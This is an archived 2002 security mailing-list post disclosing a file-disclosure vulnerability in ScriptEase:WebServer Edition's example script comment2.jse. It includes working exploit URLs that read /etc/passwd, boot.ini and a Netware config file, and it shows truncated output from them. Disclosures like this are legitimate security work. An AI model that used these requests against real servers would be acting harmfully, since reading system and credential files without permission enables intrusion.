ScriptEase:WebServer Edition vulnerability

From: Aleksander Posmyk (blahat_private)
Date: Sun Feb 24 2002 - 02:47:14 PST

  • Next message: Scott Walker Register: "Re: CheckPoint FW1 HTTP Security Hole"

    Program: ScriptEase:WebServer Edition
    Url: www.nombas.com
    Problem: Any user can read files on server using one of examle scripts: comment2.jse
    Systems affected: Linux, Novell Netware, Windows 9x/NT/2k
    
    Example:
    WindowsNovell Netware:
    http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
    SET CLIENT FILE ...:
    http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
    [boot loader] timeout=10 ...
    
    
    
    Linux:
    http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
    root:....
    
    I found this in a default instalation of Novell Netware 5.1...
    Sorry for my english.
    ________________________________
    Aleksander Posmyk - blahat_private 
    



    This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 11:12:19 PST